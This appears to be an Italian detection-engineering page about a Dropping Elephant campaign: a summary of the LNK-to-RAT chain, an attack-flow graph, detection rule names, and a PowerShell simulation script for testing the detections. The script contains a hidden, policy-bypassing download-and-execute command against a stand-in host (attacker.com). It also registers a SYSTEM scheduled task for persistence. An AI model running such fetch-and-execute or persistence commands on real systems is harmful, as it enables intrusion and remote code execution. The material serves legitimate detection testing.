Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Una sofisticata campagna attribuita a Dropping Elephant utilizza documenti esca a tema Cina per distribuire un trojan di accesso remoto aggiornato e residente in memoria. L’intrusione si basa sul caricamento laterale DLL tramite un binario Microsoft legittimo e sul caricatore di shellcode Donut per evitare il rilevamento su disco. Il carico finale utilizza anche metodi avanzati di evasione, tra cui l’appiattimento del flusso di controllo e la ricostruzione delle API in tempo reale.
Indagine
I ricercatori di Rapid7 hanno scoperto la minaccia durante una caccia proattiva che è iniziata con un collegamento Windows dannoso mascherato da documento PDF. La loro indagine ha seguito la catena di carico utile dalla messa in scena iniziale su chinagreenenergy[.]org tramite il caricamento laterale DLL di APPWIZ.cpl all’esecuzione di un RAT in memoria. L’analisi a livello di codice con Diaphora ha confermato una discendenza comune con precedenti campioni di Dropping Elephant nonostante ampi rimaneggiamenti.
Mitigazione
I difensori dovrebbero dare priorità alle rilevazioni comportamentali, come file di collegamento che avviano PowerShell e messa in scena sospetta di carichi utili in C:UsersPublic. È anche importante monitorare i compiti pianificati con nomi insoliti e identificare il caricamento laterale DLL da directory inaspettate. Inoltre, le difese degli endpoint necessitano di visibilità a livello di memoria per rilevare la manomissione con AMSI, WLDP e ETW.
Risposta
Se viene rilevata questa attività, isolare immediatamente i sistemi colpiti per interrompere ulteriori traffici di comando e controllo. Eseguire la forense della memoria per identificare il RAT iniettato e ispezionare i compiti pianificati per la persistenza. Anche i registri di rete dovrebbero essere esaminati per traffico HTTPS non autorizzato verso i domini C2 noti e per qualsiasi segno di esfiltrazione di file.
graph TB %% Definizioni delle classi classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 %% Definizione dei nodi %% Accesso iniziale ed esecuzione action_user_exec[“<b>Azione</b> – <b>T1204.002 Esecuzione da parte dell’utente: File malevolo</b><br/>La vittima esegue un file di collegamento dannoso<br/><b>File</b>: GRES3001.lnk<br/><b>Travestimento</b>: icona PDF”] class action_user_exec action action_icon_smuggling[“<b>Azione</b> – <b>T1027.012 File o informazioni offuscati: LNK Icon Smuggling</b><br/>Inganna l’utente tramite la manipolazione dell’icona<br/><b>Metodo</b>: falsificazione dell’icona del file LNK”] class action_icon_smuggling action %% Fase del downloader process_conhost[“<b>Processo</b> – <b>conhost.exe</b><br/>Processo host per le finestre della console<br/><b>Ruolo</b>: avvia il downloader PowerShell”] class process_conhost process action_binary_padding[“<b>Azione</b> – <b>T1027.001 File o informazioni offuscati: Binary Padding</b><br/>Utilizza l’offuscamento tramite suddivisione di stringhe<br/><b>Obiettivo</b>: script downloader PowerShell”] class action_binary_padding action tool_downloader[“<b>Strumento</b> – <b>Downloader PowerShell</b><br/>Recupera file esca e payload malevoli<br/><b>Fonte</b>: chinagreenenergy[.]org”] class tool_downloader tool %% Post-download e persistenza action_masquerading[“<b>Azione</b> – <b>T1036.008 Mascheramento: Mascheramento del tipo di file</b><br/>Rinomina i file per farli sembrare legittimi<br/><b>Directory</b>: C:\\Users\\Public\\”] class action_masquerading action action_persistence[“<b>Azione</b> – <b>T1546 Esecuzione attivata da eventi</b><br/>Garantisce la persistenza tramite un’attività pianificata<br/><b>Nome attività</b>: GoogleErrorReport<br/><b>Intervallo</b>: ogni minuto”] class action_persistence action %% Catena di esecuzione e side-loading action_proxy_exec[“<b>Azione</b> – <b>T1218.002 Esecuzione proxy tramite binari di sistema: Pannello di controllo</b><br/>Utilizza un binario legittimo per eseguire il loader<br/><b>Binario</b>: Fondue.exe”] class action_proxy_exec action tool_loader_cpl[“<b>Strumento</b> – <b>APPWIZ.cpl</b><br/>Loader malevolo del Pannello di controllo<br/><b>Metodo</b>: DLL Side-loading”] class tool_loader_cpl tool action_reflective_load[“<b>Azione</b> – <b>T1620 Caricamento riflessivo del codice</b><br/>Mappa il codice direttamente in memoria<br/><b>Loader</b>: loader shellcode Donut”] class action_reflective_load action %% Post-sfruttamento e C2 malware_rat[“<b>Malware</b> – <b>RAT</b><br/>Trojan di accesso remoto<br/><b>Stato</b>: residente in memoria”] class malware_rat malware action_gather_info[“<b>Azione</b> – <b>T1592 Raccolta di informazioni sull’host vittima</b><br/>Raccoglie metadati del sistema<br/><b>Dati</b>: nome utente, nome computer, sistema operativo, indirizzo IP”] class action_gather_info action action_c2[“<b>Azione</b> – <b>TA0011 Comando e Controllo</b><br/>Mantiene la comunicazione tramite HTTPS<br/><b>Dominio</b>: gcl-power[.]org”] class action_c2 action action_exfiltration[“<b>Azione</b> – <b>Cattura dello schermo ed esfiltrazione</b><br/>T1113 Acquisizione dello schermo<br/><b>Obiettivo</b>: furto di dati”] class action_exfiltration action %% Flusso delle connessioni action_user_exec –>|porta_a| action_icon_smuggling action_icon_smuggling –>|attiva| process_conhost process_conhost –>|utilizza| action_binary_padding action_binary_padding –>|esegue| tool_downloader tool_downloader –>|scarica_in| action_masquerading action_masquerading –>|configura| action_persistence action_persistence –>|attiva| action_proxy_exec action_proxy_exec –>|carica| tool_loader_cpl tool_loader_cpl –>|utilizza| action_reflective_load action_reflective_load –>|installa| malware_rat malware_rat –>|esegue| action_gather_info malware_rat –>|stabilisce| action_c2 action_c2 –>|facilita| action_exfiltration
Flusso di attacco
Rilevamenti
Possibile tentativo di comunicazione dominio di ricerca IP (via dns)
Visualizza
Esecuzione insolita di modifica della pagina di codice (via cmdline)
Visualizza
Attività pianificata sospetta (via audit)
Visualizza
Esecuzione sospetta dal profilo utente pubblico (via process_creation)
Visualizza
Libreria dinamica Vcruntime140 caricata da directory sospetta (via image_load)
Visualizza
File sospetti nel profilo utente pubblico (via file_event)
Visualizza
Rilevamento della Campagna Malware di Dropping Elephant [Connessione di Rete di Windows]
Visualizza
Caricamento DLL Malevolo Laterale via Fondue.exe [Evento File di Windows]
Visualizza
Riconoscimento della Campagna Malware Dropping Elephant via Collegamento e Caricamento Laterale [Creazione Processo di Windows]
Visualizza
Esecuzione di Simulazione
Requisito: La Verifica Pre-volo di Telemetria e Baseline deve essere superata.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVE riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa e Comandi dell’Attacco: L’avversario mira a stabilire la persistenza ed eseguire un downloader. Per bypassare i filtri standard delle email, utilizzano un collegamento denominato
GRES3001.lnkche appare come un PDF. Quando viene cliccato, chiamaconhost.exeper eseguire uno script PowerShell. Contemporaneamente, stabiliscono la persistenza creando un compito pianificato chiamatoGoogleErrorReportche è progettato per eseguireFondue.exeda una directory pubblica, mascherandosi come un legittimo reporter di errori di Google per evitare ispezioni casuali. -
Script di Test di Regressione:
# 1. Simulare il comportamento di Scorciatoia/Conhost # Simuliamo l'esecuzione di conhost.exe con la stringa specifica nella riga di comando Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" # Nota: Per rispecchiare strettamente 'CommandLine contains GRES3001.lnk' della regola, simuliamo la chiamata del processo come se provenisse da quel file. # Poiché non possiamo facilmente falsificare il nome del processo padre in uno script semplice, simuliamo la stringa di riga di comando prevista. Write-Host "[!] Simulazione di attivazione di GRES3001.lnk..." $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Caricato'" # In un ambiente reale, il campo 'CommandLine' in Sysmon conterrebbe la stringa di destinazione. # 2. Simulare il Compito Pianificato e Fondue.exe caricamento laterale Write-Host "[!] Simulazione del compito pianificato GoogleErrorReport..." New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload" $TaskName = "GoogleErrorReport" $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe" Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Compito Dropping Elephant Simulato" -User "SYSTEM" -Force Write-Host "[+] Simulazione Completa. Controlla SIEM per avvisi." -
Comandi di Pulizia:
# Rimuovere il binario di malware fittizio Remove-Item -Path "C:UsersPublicFondue.exe" -Force # Rimuovere il compito pianificato maligno Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false Write-Host "[+] Pulizia Completa."